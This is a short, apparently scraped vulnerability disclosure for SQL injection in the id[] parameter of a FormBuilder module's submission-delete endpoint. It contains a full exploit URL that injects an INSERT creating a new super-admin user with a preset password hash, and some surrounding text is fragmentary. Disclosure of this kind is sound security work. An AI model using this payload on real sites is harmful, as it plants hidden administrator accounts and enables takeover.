When deleting submissions which belong to a formular (made with module FormBuilder
), the parameter id[]
is vulnerable for SQL injection.
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%[email protected]%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
form_id
to another value.users
table.The attacker can tamper data in the database as they want.